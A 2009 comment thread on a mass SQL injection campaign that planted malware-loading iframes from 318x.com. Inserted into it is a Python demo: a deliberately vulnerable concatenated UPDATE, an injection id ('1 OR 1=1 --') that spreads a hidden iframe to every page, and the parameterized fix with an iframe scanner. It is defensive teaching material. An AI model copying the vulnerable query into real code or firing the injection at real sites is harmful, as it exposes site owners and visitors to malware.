
SQL Injection Attack Claims 132,000+

An anonymous reader writes "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009."
  • 318x.com (Score:2, Interesting)

    by NoYob ( 1630681 ) on Thursday December 10, 2009 @10:29AM (#30387772)
    I tried to go there and I got this from Google: Diagnostic page for 318x.com [google.com]

    After doing a whois, I see that just about all information is described as "Unknown"

    Why is this domain still in existence? Can ICANN take it down?

    It looks like the sole reason for this domain is for malware.

  • by v1 ( 525388 ) on Thursday December 10, 2009 @10:30AM (#30387786) Homepage Journal

    If they know where the site is that's hosting the payload why don't they just shut them down? I realize the locations for the hosting are carefully chosen to provide maximum insulation, but still you'd expect that by now (years after this sort of thing became common) that there'd be mechanisms and procedures in place to break these down swiftly?

  • How is SQL involved? (Score:4, Interesting)

    by Bromskloss ( 750445 ) on Thursday December 10, 2009 @10:38AM (#30387874)

    The article said "SQL" in the headline, but never mentioned it again after that.

  • by jDeepbeep ( 913892 ) on Thursday December 10, 2009 @10:44AM (#30387922)

    The article said "SQL" in the headline, but never mentioned it again after that.

    My guess is that the compromised websites all have something in common, such as running the same CMS for example. You're right though, the article is short on details of the injection itself.

  • No... (Score:3, Interesting)

    by Oxford_Comma_Lover ( 1679530 ) on Thursday December 10, 2009 @10:56AM (#30388064)
    The assumption is that once there are a hundred thousand servers hit, and maybe fewer, if the hosting company doesn't shut down the site within an hour or two a responsible upstream router blocks traffic from the site. Every delivered payload costs society more time and money.
  • by gregarican ( 694358 ) on Thursday December 10, 2009 @11:14AM (#30388258) Homepage
    Validate your SQL inputs before posting them against an Internet-facing database. This isn't an SQL problem. This isn't a Windows-based problem. This is a poor coders problem. If there are high-profile websites that were compromised I'd be one pissed off PHB fo sho...
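The "validate your SQL inputs" point above, shown as an added example that is not part of the original thread or of any software it mentions. It models a hypothetical CMS "edit page" endpoint backed by an in-memory SQLite table with constructed rows: the concatenated UPDATE lets a crafted page id turn one user's edit into a site-wide defacement that plants an iframe, the parameterized version rejects the same request, and a small scan over stored content flags iframes pointing at a host that isn't ours. The iframe host `malware.example` is a placeholder, and the single-statement injection used here is one generic vector, not a claim about how the campaign in the story actually worked.

```python
import re
import sqlite3

# Constructed sample content for a hypothetical CMS; not real site data.
PAGES = [
    (1, "alice", "<p>Welcome to Alice's page</p>"),
    (2, "bob", "<p>Bob's photo gallery</p>"),
    (3, "carol", "<p>Carol's recipes</p>"),
]

# Hypothetical attacker payload: the hidden iframe a mass-injection
# campaign appends to stored content (placeholder host, never fetched).
IFRAME = '<iframe src="http://malware.example/in.php" width="0" height="0"></iframe>'

# Matches an iframe and captures the host of its src attribute.
IFRAME_RE = re.compile(r'<iframe[^>]*src=["\']?(?:https?:)?//([^/"\'\s>]+)', re.I)


def fresh_db():
    """Build an in-memory pages table populated with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, owner TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", PAGES)
    conn.commit()
    return conn


def update_page_vulnerable(conn, user, page_id, new_body):
    """Concatenated UPDATE: page_id reaches the SQL parser as SQL text.

    A page_id of "1 OR 1=1 --" widens the WHERE clause to every row and
    comments out the owner check, so one request rewrites every page.
    """
    sql = (f"UPDATE pages SET body = '{new_body}' "
           f"WHERE id = {page_id} AND owner = '{user}'")
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def update_page_safe(conn, user, page_id, new_body):
    """Type-check the id, then bind every value as a query parameter."""
    try:
        pid = int(page_id)
    except (TypeError, ValueError):
        return 0  # reject malformed ids instead of guessing
    cur = conn.execute(
        "UPDATE pages SET body = ? WHERE id = ? AND owner = ?",
        (new_body, pid, user),
    )
    conn.commit()
    return cur.rowcount


def find_foreign_iframes(conn, own_hosts):
    """Return (page_id, host) for every stored iframe whose host isn't ours."""
    hits = []
    for pid, body in conn.execute("SELECT id, body FROM pages ORDER BY id"):
        for host in IFRAME_RE.findall(body or ""):
            if host.lower() not in own_hosts:
                hits.append((pid, host.lower()))
    return hits


def demo():
    """Run the same hostile request against both handlers and scan the results."""
    own_hosts = {"www.example.com"}
    hostile_id = "1 OR 1=1 --"
    results = {}

    conn = fresh_db()
    results["vulnerable_rows"] = update_page_vulnerable(conn, "mallory", hostile_id, IFRAME)
    results["vulnerable_hits"] = find_foreign_iframes(conn, own_hosts)

    conn = fresh_db()
    results["safe_rows"] = update_page_safe(conn, "mallory", hostile_id, IFRAME)
    results["safe_hits"] = find_foreign_iframes(conn, own_hosts)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable handler reports three rows changed and the scan finds the foreign iframe on all three pages; the parameterized handler changes nothing and the scan comes back clean. The scan is the sort of check a site owner would want after a story like this: look for iframes in your own stored content whose host you don't recognise, rather than waiting for a Safe Browsing warning.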
  • by erroneus ( 253617 ) on Thursday December 10, 2009 @12:25PM (#30389308) Homepage

    The sources of the attacks are servers that have been compromised through SQL injection. I get that. It's an important detail. They fail to identify what sites and/or what those sites are running that is exploitable in this way. Is it MySQL? Is it MS SQL? Oracle? Is it a particular software package running on a particular web host platform? The questions are too many and should have been answered in the article.

    What is done after a server is compromised is pretty common. Microsoft components, especially those linked through ActiveX, have been not just a hole in Microsoft security, but a tunnel into the Windows kernel big enough to drive a truck through. A vulnerability in Adobe Flash is only a problem when it uses ActiveX to get there. Flash running in other ways does not seem to pose such an extreme threat otherwise. But while these are important security concerns to be aware of, it has nothing to do with the topic of the story as indicated by the headline or the first line of the story, which is about compromised SERVERS, not about compromised clients.

  • 132,000? Try 1269. (Score:2, Interesting)

    by milesw ( 91604 ) on Thursday December 10, 2009 @12:39PM (#30389606) Homepage

    As many have pointed out, the blog post does not offer sufficient detail, but does offer the rather sensational headline "SQL injection attack claims 132,000+". The Google Safe Browsing diagnostic page for 318x.com has it closer to 1200 or so:

    http://google.com/safebrowsing/diagnostic?site=318x.com/

    Has this site acted as an intermediary resulting in further distribution of malware?
    Over the past 90 days, 318x.com appeared to function as an intermediary for the infection of 1202 site(s) including 37y.org/, jxagri.gov.cn/, glojj.com/.

    Has this site hosted malware?
    Yes, this site has hosted malicious software over the past 90 days. It infected 1269 domain(s), including 37y.org/, cec.org.cn/, jxagri.gov.cn/.
